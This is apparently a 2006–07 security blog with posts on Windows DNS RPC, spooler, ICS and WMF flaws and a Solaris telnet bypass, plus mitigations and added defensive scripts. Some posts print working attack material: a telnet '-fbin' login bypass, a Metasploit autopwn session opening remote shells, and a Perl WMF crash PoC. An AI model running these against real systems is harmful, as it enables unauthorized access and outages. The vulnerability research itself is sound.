04.15.07
Posted in Exploits, IT, Security, Vulnerabilities at 4:49 pm by Tyler Reguly
It's amazing how quickly the community can respond... In the past 24 hours I've seen exploits from three sources for this vulnerability. We've got an exploit for metasploit, an exploit written in python and one written in C. (I considered whether or not I'd link to these but since they're all publicly available... I might as well). Here are a couple images of the exploit.
[Image: Exploit executed in Metasploit]
[Image: Looking at the process on the vulnerable box]
So here's the information we've got from all the various sources:
- The vulnerable function is: extractQuotedChar()
- This function is reached via:
  - Interface: 50abc2a4-574d-40b3-9d66-ee4fd5fba076 v5.0
  - Operation: DnssrvQuery
  - OpCode: 0x01
- The attack can be performed anonymously against the listening RPC interface (a TCP port between 1024 and 5000).
- The attack can also be performed with credentials against port 445.
- Original attacks: April 4th and 5th against two US universities
- Original attack details (Source):
  - Shellcode binds to TCP port 1100.
  - Attacker uploads a VBScript on this port and then runs it.
  - VBScript downloads an executable, DUP.EXE (MD5: a5ae220fec052a1f2cd22b4eb89a442e), from 203.66.151.92/images/.
  - Executable is self-extracting and contains PWDUMP v5 and an associated DLL.
- Microsoft Advisory (including mitigation information)
- Mitigation: How to script the mitigation technique across an entire domain.
Now I guess the question remains, "Will we see an Out-of-Band Update to fix this issue?"
It's an interesting question because the views are so varied on the seriousness of this issue. An example of this debate is this thread on the dns-operations mailing list.
So it's fair to assume that this won't be a HUGE issue... as others have said this won't be Slammer or Code Red. That doesn't mean this isn't a serious issue. I also question the flawed logic I've seen, on various discussion boards, mailing lists and even in conversations with friends, on who this will affect and why this would "only affect idiots".
I think the people making these assumptions are from corporate environments and the actual IS industry... They're forgetting about small and medium businesses. I think this has much more serious consequences in the SMB environment. Let's think about the number of SMBs out there... how many of these businesses have purchased SBS Server and popped it into their network? SBS is a security nightmare... all of your services on your domain controller, including Exchange, and the user is told to place it live on the internet. I've walked into environments where the SBS is plugged into a Linksys router and that router is plugged into the internet connection. One might think, "Well the router will filter the affected ports"... right and wrong. The environments I've seen have been too lazy (or lacked the knowledge) to properly configure the router and set up forwarded ports for things like Exchange. Instead they've simply put the SBS on the DMZ, opening it up to the world... and to vulnerabilities such as this one.
So I am concerned by this... should someone decide to create a worm, that's a large number of zombied computers that they could have... A growing botnet based on insecure SMBs. It may not be an extraordinary number of computers but it would be substantial. I'd wager a guess that given a) the number of businesses that have slapped a setup together and b) the number of businesses that have relied on "on-site computer service professionals" that there are a large number of vulnerable computers sitting and waiting to be exploited.
Do I think this will ever be turned into a worm? Nope. Do I think this is serious and dangerous? You bet. I guess only time will tell.
04.11.07
Posted in Exploits, IT, Security, Vulnerabilities at 5:58 pm by Tyler Reguly
Yet again we see it happening... Patch Tuesday rolls around and suddenly we're hit by more "0-days" for Microsoft products. This time it's primarily Office, but a heap-overflow in .HLP files was also released. McAfee AVERT Labs have been doing some research into the vulnerabilities, however they haven't had much to say yet. Initially they only addressed the Office flaws but came back later to include the .HLP heap-overflow. These 4 PoCs (2 DoS and 2 overflows) were released to the Full Disclosure mailing list by muts (of BackTrack fame). This was also discussed over at heise Security. They have mentioned that there's no proof yet that these are new vulnerabilities, they may actually be related to the vulnerabilities announced by eEye.
I guess only time will tell but this could mean an increase to the number of items on the 'Missing Microsoft Patches' list.
03.27.07
Posted in Exploits, IT, Security, Tools at 3:05 pm by Tyler Reguly
From the Metasploit Homepage:
March 27th, 2007 -- Metasploit is pleased to announce the immediate, free availability of the Metasploit Framework version 3.0 from http://framework.metasploit.com/.
The Metasploit Framework ("Metasploit") is a development platform for creating security tools and exploits. Version 3.0 contains 177 exploits, 104 payloads, 17 encoders, and 3 nop modules. Additionally, 30 auxiliary modules are included that perform a wide range of tasks, including host discovery, protocol fuzzing, and denial of service testing.
The full Release Notes can be found via the download page, which also contains download links for both a tarball and a Windows executable.
03.11.07
Posted in Exploits, IT, Security at 1:14 am by Tyler Reguly
A Proof of Concept memory corruption has been released on milw0rm. This is coming from the author of the Internet Connection Sharing DoS. I'm wondering if we'll see an excess of MS exploits this month given their decision not to patch any of the existing flaws.
02.11.07
Posted in Exploits, IT, Security, Vulnerabilities at 3:24 am by Tyler Reguly
We've all heard it before... Don't run telnet because it's a plain text protocol, it's an inherent security risk... Which is true, SSH just makes more sense and plenty of people are using SSH these days. This doesn't mean that everyone is though, so... *ATTENTION SOLARIS ADMINS* If you're still running telnet on Solaris 10 or 11 (SunOS 5.10 or 5.11)... Turn it off. An email was released on Full Disclosure earlier with a new 0-day for Solaris 10/11 that's so easy it makes my skin crawl. This PDF, linked in the email, gives details and a small shell script to perform the exploit. It seemed surprising that this existed and had not been previously found, so of course I had to try it out.
C:\Documents and Settings\treguly>telnet -l "-fbin" X.X.X.X
Last login: Sun Feb 11 00:24:44 from XXXX
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ id
uid=2(bin) gid=2(bin)
$
The result is more than a little frightening...
A Hat Tip for this goes to Maynor and the Errata Security Blog for informing me of this issue.
[UPDATE] While it was initially rumoured that this didn't affect the root account, this is not the case... root logins are possible... it is dependent on configuration. More info on the nCircle Blog.
12.03.06
Posted in Exploits, IT, Security, Vulnerabilities at 10:52 pm by Tyler Reguly
Let's call this attempt #2. I attempted to blog on this subject earlier this evening but when I published the post, only half of it was there... I've learned to either save frequently... or use an outside text editor to compose my posts.
Anyways, a couple of blogs have been mentioning a new 0-day DoS which is available on milw0rm. FrSIRT has released an advisory on the subject. I spent some time earlier today looking into the exploit...
This is included in the comments of the exploit (which is written in python):
# Tested on Windows 2000 SP4 Polish + All Microsoft Security Bulletins
# Example:
#
# C:\>python spoolss_dos.py 192.168.0.2 512
#
# [*] MS Windows GetPrinterData() 0day Memory Allocation Remote DoS Exploit
# [*] Coded by h07
# [*] Connecting to 192.168.0.2:445
# [+] Connected
# [+] The NETBIOS connection with the remote host timed out.
# [+] 192.168.0.2: Out of memory
# [+] Done
#
# Exploit --> GetPrinterData(handle, value, 1024 * 1024 * 512) --> MS_Windows
# Spooler service(spoolsv.exe) memory usage: 512 MB
I tested the exploit against Windows XP SP2. Both machines that I tested it against returned the message "Return code: Access denied (0x00000005)". This same message was also received when attempting the exploit on a Windows XP SP1 machine.
I moved my testing on to 2K. In the end I ran the exploit about 10 times, using values from 128 to 1024. Every time I ran the DoS the amount of memory in use would increase. If I attempted a value higher than the remaining available memory, I would receive a "Memory Allocation Error". When I reached the end of the available memory, my virtual memory would grow until it finally hit the maximum allowed virtual memory. At this point I received an error message on the system informing me that my Virtual Memory Minimum was too low. I ran the exploit a couple more times after this happened (using 256 as my value) and eventually the UI became unresponsive. I could very slowly move the mouse, however the taskbar clock wasn't updating with the time, and I couldn't click on anything. I was essentially forced to reboot the system. Upon reboot, there was no indication of what had caused the problem, or that there had been a problem.
It is important to remember that this DoS requires the Printer Spooler service to be enabled. For a previous Printer Spooler vulnerability, Microsoft offered the following advice:
Option 1: Disable the Print Spooler service
(HT's Note: This solution was suggested on Donna's Security Flash as well as in MS Advisory MS05-043. I suggest option two, which is below and was also included in MS05-043.)
Disabling the Print Spooler service will help protect the affected system from attempts to exploit this vulnerability. To disable the Print Spooler service, follow these steps:
1. Click Start, and then click Control Panel. Alternatively, point to Settings, and then click Control Panel.
2. Double-click Administrative Tools.
3. Double-click Services.
4. Double-click Print Spooler.
5. In the Startup type list, click Disabled.
6. Click Stop, and then click OK.
You can also stop and disable the Print Spooler service by using the following command at the command prompt:
sc stop Spooler & sc config Spooler start= disabled
Impact of Workaround: If you disable the Print Spooler service, you cannot print locally or remotely. Therefore, we recommend this workaround only on systems that do not require printing.
------
Option 2: Remove Printer Spooler Service from NullSessionPipes.
On Windows 2000 Server Service Pack 4 remove the Print Spooler service from the NullSessionPipes registry key:
1. Click Start, click Run, type "regedt32" (without the quotation marks), and then click OK.
2. In Registry Editor, locate the following registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\NullSessionPipes
3. Edit the registry key and remove the SPOOLSS value.
4. Restart the affected system after performing these actions.
Impact of Workaround: Anonymous connections to the Print Spooler service will not be allowed. This is the default behavior of later operating system versions.
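Option 2 can be audited offline instead of by hand: export the Parameters key from each machine (reg export) and inspect NullSessionPipes, which is a REG_MULTI_SZ value that .reg files store as hex(7) UTF-16LE bytes. The script below is an added example, not Microsoft's or the original post's code; the export it embeds is constructed, and hardened_export() is my own helper that writes an importable .reg file with SPOOLSS removed.

```python
import re

# NullSessionPipes is a REG_MULTI_SZ under LanmanServer\Parameters; a .reg export
# stores it as hex(7): UTF-16LE bytes, comma separated, wrapped with a trailing
# backslash and indented continuation lines.
VALUE_RE = re.compile(r'^"NullSessionPipes"=hex\(7\):(.*)$', re.IGNORECASE)

# Constructed sample export from a hypothetical host: COMNAP, COMNODE, SPOOLSS.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"NullSessionPipes"=hex(7):43,00,4f,00,4d,00,4e,00,41,00,50,00,00,00,43,00,4f,00,\
  4d,00,4e,00,4f,00,44,00,45,00,00,00,53,00,50,00,4f,00,4f,00,4c,00,53,00,\
  53,00,00,00,00,00
"""

def unwrap_lines(reg_text):
    """Join backslash-continued .reg lines into single logical lines."""
    out, buf = [], None
    for raw in reg_text.splitlines():
        piece = raw.strip() if buf is not None else raw.rstrip()
        if piece.endswith("\\"):
            buf = (buf or "") + piece[:-1]
        else:
            out.append((buf or "") + piece)
            buf = None
    if buf is not None:
        out.append(buf)
    return out

def decode_multi_sz(hex_csv):
    """hex(7) payload -> list of strings (NUL separated, double NUL terminated)."""
    data = bytes(int(tok, 16) for tok in hex_csv.split(",") if tok.strip())
    return [s for s in data.decode("utf-16-le").split("\x00") if s]

def encode_multi_sz(strings):
    """Inverse of decode_multi_sz, emitted as one unwrapped hex(7) payload."""
    data = b"".join(s.encode("utf-16-le") + b"\x00\x00" for s in strings) + b"\x00\x00"
    return ",".join(f"{b:02x}" for b in data)

def null_session_pipes(reg_text):
    """Pipe names listed in the export, or None when the value is absent."""
    for line in unwrap_lines(reg_text):
        m = VALUE_RE.match(line)
        if m:
            return decode_multi_sz(m.group(1))
    return None

def spooler_accepts_null_sessions(reg_text):
    """True while SPOOLSS is still listed, i.e. option 2 has not been applied."""
    return any(p.upper() == "SPOOLSS" for p in (null_session_pipes(reg_text) or []))

def hardened_export(reg_text):
    """Same export with SPOOLSS removed from the value; import it to apply option 2."""
    def fix(line):
        m = VALUE_RE.match(line)
        if not m:
            return line
        kept = [p for p in decode_multi_sz(m.group(1)) if p.upper() != "SPOOLSS"]
        return '"NullSessionPipes"=hex(7):' + encode_multi_sz(kept)
    return "\n".join(fix(line) for line in unwrap_lines(reg_text)) + "\n"
```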
It is also important to note that, based on the output we see in the exploit, it would appear that access to port 445 is required. Firewalling this port should prevent remote DoS attempts.
Peace,
HT
10.29.06
Posted in Exploits, IT, Security, Vulnerabilities at 3:34 am by Tyler Reguly
A new MS exploit showed up on milw0rm yesterday -- http://www.milw0rm.com/exploits/2672 (Code is written in Python and quite easy to follow)...
Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit
The exploit requires Internet Connection Sharing to be enabled and requires that the attacker be on the shared interface (from what I've seen in my playing thus far).
Malicious Person --- Computer with ICS --- Internet
I ran Windows Updates on an XP SP2 machine immediately prior to testing this... so it *SHOULD* have been fully up-to-date.
I've attached a few of the details below.
Peace,
HT
------
Microsoft Error Message:
Generic Host Process for Win32 Services has encountered a problem and needs to close. We are sorry for the inconvenience.
View What's in this report:
Error signature:
szAppName: svchost.exe szAppVer: 5.1.2600.2180
szModName: ipnathlp.dll szModVer 5.1.2600.2180 offset: 0001d45e
mdmp file created during crash loaded into WinDbg
Microsoft (R) Windows Debugger Version 6.6.0007.5
Copyright (c) Microsoft Corporation. All rights reserved.
This dump file has an exception of interest stored in it.
The stored exception information can be accessed via .ecxr.
(570.5ec): Access violation - code c0000005 (first/second chance not available)
0:077> .ecxr
eax=00000000 ebx=0018aef8 ecx=00000001 edx=0000022d esi=0018af44 edi=00800002
eip=6647d45e esp=0207fed0 ebp=0207ff30 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ipnathlp!DnsProcessQueryMessage+0xe8:
6647d45e 8a10 mov dl,byte ptr [eax] ds:0023:00000000=??
09.22.06
Posted in Exploits, IT, Security, Vulnerabilities at 10:00 pm by Tyler Reguly
So the guys over at ZERT have released what I believe is their first patch since forming. The group, the Zeroday Emergency Response Team, has put out a patch for the IE VML 0Day (MS Advisory | Press | Source Code) that has been circulating. If you are interested in it you can download it from their website.
This has me thinking a lot about patch management and I'm going to put some thought into it tomorrow and publish it tomorrow night or Sunday morning.
Peace,
HT
09.17.06
Posted in Exploits, IT, Security at 11:38 pm by Tyler Reguly
H.D. Moore has released a great article on performing automated exploitation using Metasploit 3.0. To obtain the latest MSF 3.0 source code you require svn... To perform the actual exploitation you'll require Ruby, PostgreSQL and RubyGems. The article provides a great explanation of setting everything up and running the automated exploitation... There's also console output to show you exactly what you type and what happens... It's definitely worth the read and once I play with it a bit, I'll be throwing my comments and results up here for everyone to read.
Peace,
HT
-----
Console Output:
-----
$ ./msfconsole
=[ msf v3.0-beta-2-svn
+ -- --=[ 102 exploits - 93 payloads
+ -- --=[ 17 encoders - 4 nops
=[ 13 aux
msf > load db_postgres
[*] Successfully loaded plugin: db_postgres
msf > db_create
dropdb: database removal failed: ERROR: database "metasploit3" does not exist
CREATE DATABASE
ERROR: table "hosts" does not exist
[ snip ]
msf > db_nmap -p 445 192.168.0.0/24
Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-09-17 22:49 CDT
Interesting ports on destructo (192.168.0.2):
PORT STATE SERVICE
445/tcp open microsoft-ds
Interesting ports on WIN2000DB.lan (192.168.0.106):
PORT STATE SERVICE
445/tcp open microsoft-ds
Interesting ports on WINXPSP0.lan (192.168.0.108):
PORT STATE SERVICE
445/tcp open microsoft-ds
Interesting ports on WIN2000SP4.lan (192.168.0.139):
PORT STATE SERVICE
445/tcp open microsoft-ds
Nmap finished: 256 IP addresses (8 hosts up) scanned in 12.493 seconds
msf > db_services
[*] Service: host=192.168.0.2 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.106 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.108 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.139 port=445 proto=tcp state=up name=microsoft-ds
msf > db_autopwn -p -t -e
[*] Analysis completed in 0.208992004394531 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.0.106:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.0.108:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.0.2:445...
[ snip ]
[*] Calling the vulnerable function...
[*] Calling the vulnerable function...
[*] Trying to exploit Windows 2000 LAN Manager
[*] Bound to 6bffd098-a112-3610-9833-46c3f87e345a:1.0@ncacn_np:192.168.0.139[\BROWSER] ...
[*] Building the stub data...
[*] Unexpected DCERPC fault 0x000006f7
[*] Calling the vulnerable function...
[*] Command shell session 4 opened (192.168.0.145:60778 -> 192.168.0.139:26188)
[*] Unexpected DCERPC fault 0x000006f7
[*] Calling the vulnerable function...
[*] Command shell session 5 opened (192.168.0.145:47380 -> 192.168.0.106:27700)
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.0.145:46858 -> 192.168.0.139:15441
2 Command shell 192.168.0.145:42700 -> 192.168.0.108:28199
3 Command shell 192.168.0.145:40966 -> 192.168.0.106:27915
4 Command shell 192.168.0.145:60778 -> 192.168.0.139:26188
5 Command shell 192.168.0.145:47380 -> 192.168.0.106:27700
msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
08.06.06
Posted in Exploits, IT, Security, Vulnerabilities at 10:07 pm by Tyler Reguly
First off... you'll notice I put exploit in quotes... I haven't investigated this yet... That's my plan for this evening... It's a crash, which means a DoS... whether you consider that an exploit or not is up to you...
Here's the original posting from FD
Posted by: cyanid-E
Description:
yet another 'windows meta file' (WMF) denial of service exploit.
System affected:
+ Windows XP SP2,
+ Windows 2003 SP1,
+ Windows XP SP1,
+ Windows XP
+ Windows 2003
Tech info:
page fault in gdi32!CreateBrushIndirect() because of invalid pointer access.
Incorrect (short) to (void*) sign extension also present.
Exploit:
=== begin of brush.pl ===
#!/usr/bin/perl
print "\nWMF PoC denial of service exploit by cyanid-E ";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
binmode(WMF);   # raw bytes, no newline translation
# 18-byte WMF header (type, header size, version, file size in words, then "cyanid-E")
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
# CreatePenIndirect record
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
# the 'bad' CreateBrushIndirect record (lbStyle 8, lbHatch 0x8000), then META_EOF
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait \n";
=== end of brush.pl ===
Just run brush.pl and try to preview brush.wmf (or even browse a folder with brush.wmf in Windows Explorer).
Discovered:
06/24/2006; vendor informed but not answered
Further information from FD:
1. 'Bad' wmf record:
07 00 00 00              length of record (in words)
FC 02                    type (CreateBrushIndirect)
08 00 00 00 00 00 00 80  'packed' (good old Win16 days) LOGBRUSH data:
    08 00        'packed' lpStyle (may be BS_DIBPATTERNPT [6] or BS_DIBPATTERN8X8 [8])
    00 00 00 00  COLORREF (any)
    00 80        'packed' lbHatch (any, signed)
2. Sign extension bug:
_CommonEnumMetaFile:
......
; normalize 'packed' LOGBRUSH
movzx eax, word ptr [ebx+6] ; lbStyle (UINT32(UINT16))
mov [ebp-0f8], eax
mov eax, [ebx + 8] ; COLORREF (as is)
mov [ebp-0f4], eax
movsx eax, word ptr [ebx+0c] ; < -- BUGBUG: lbHatch (UINT32(INT16))
lea eax, [ebp-0f8]
push eax
call _CreateBrushIndirect
......
3. Memory access to fake 'pointer to packed DIB' (lbHatch) bug:
cmp edi, 6 ; BS_DIBPATTERNPT == lbStyle
jz _go2crush
......
cmp edi, 8 ; BS_DIBPATTERN8X8 == lbStyle
jz _go2crush
......
_go2crush:
push esi
push 1
push eax, [ebp+10]
push eax
push dword ptr [ebp+0c] ; 1
push dword ptr [ebp+18] ; lpHatch (fake *packedDIB)
call _pbmiConvertInfo
......
......
_pbmiConvertInfo:
......
push ebx
mov ebx, [ebp+8] ; lpHatch (fake *packedDIB)
......
mov eax, [ebx] ; < -- BUGBUG: crush or random (in first 0x7f00 bytes)
; memory access (see @ 0x3000 region)
I'll keep people informed as I play with it...
Peace,
HT
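The record layout and sign-extension described in the quoted analysis can be checked for mechanically before a file ever reaches Explorer. The parser below is an added example (not cyanid-E's code and not part of the original post): it walks the WMF records, flags any CreateBrushIndirect whose packed LOGBRUSH selects a DIB-pattern style (both BS_DIBPATTERNPT and BS_DIBPATTERN8X8, generalizing past the one style in the PoC), and also accepts files with the 22-byte placeable header, which brush.wmf lacks. Its sample input is the 68 bytes brush.pl writes.

```python
import struct

# Standard 18-byte header: Type, HeaderSize (words), Version, SizeLow, SizeHigh,
# NumberOfObjects, MaxRecord, NumberOfMembers. The PoC stuffs "cyanid-E" into the
# last three fields, so a parser must not trust the header counts.
META_HEADER = struct.Struct("<HHHHHHIH")
PLACEABLE_KEY = b"\xD7\xCD\xC6\x9A"       # optional 22-byte Aldus placeable header
META_EOF, META_CREATEBRUSHINDIRECT = 0x0000, 0x02FC
BS_DIBPATTERNPT, BS_DIBPATTERN8X8 = 6, 8  # styles where lbHatch is used as a pointer

# The 68 bytes brush.pl writes, concatenated from the quoted PoC.
BRUSH_WMF = bytes.fromhex(
    "010009000003220000006379616e69642d45"  # header, "cyanid-E" in the count fields
    "07000000fc020000000000000000"          # CreateBrushIndirect, lbStyle 0 (solid)
    "08000000fa0200000000000000000000"      # CreatePenIndirect
    "07000000fc020800000000000080"          # CreateBrushIndirect, lbStyle 8, lbHatch 0x8000
    "030000000000"                          # META_EOF
)

def metafile_records(data):
    """Yield (offset, function, params) per record, up to and including META_EOF."""
    if data.startswith(PLACEABLE_KEY):
        data = data[22:]                   # offsets are then relative to this point
    hdr = META_HEADER.unpack_from(data, 0)
    if hdr[0] not in (1, 2) or hdr[1] != 9:
        raise ValueError("not a WMF header")
    off = hdr[1] * 2
    while off + 6 <= len(data):
        size_words, func = struct.unpack_from("<IH", data, off)
        size = size_words * 2
        if size < 6 or off + size > len(data):
            raise ValueError(f"record at {off:#x}: bad size {size_words} words")
        yield off, func, data[off + 6:off + size]
        if func == META_EOF:
            return
        off += size
    raise ValueError("META_EOF missing")

def suspicious_brushes(data):
    """Flag CreateBrushIndirect records whose packed LOGBRUSH selects a DIB-pattern
    style: gdi32 then sign-extends the 16-bit lbHatch and dereferences it."""
    hits = []
    for off, func, params in metafile_records(data):
        if func != META_CREATEBRUSHINDIRECT or len(params) < 8:
            continue
        style, _color, hatch = struct.unpack_from("<HIh", params, 0)  # lbStyle, COLORREF, lbHatch
        if style in (BS_DIBPATTERNPT, BS_DIBPATTERN8X8):
            hits.append({"offset": off, "style": style, "hatch": hatch & 0xFFFF,
                         "as_pointer": hatch & 0xFFFFFFFF})  # the value movsx produces
    return hits
```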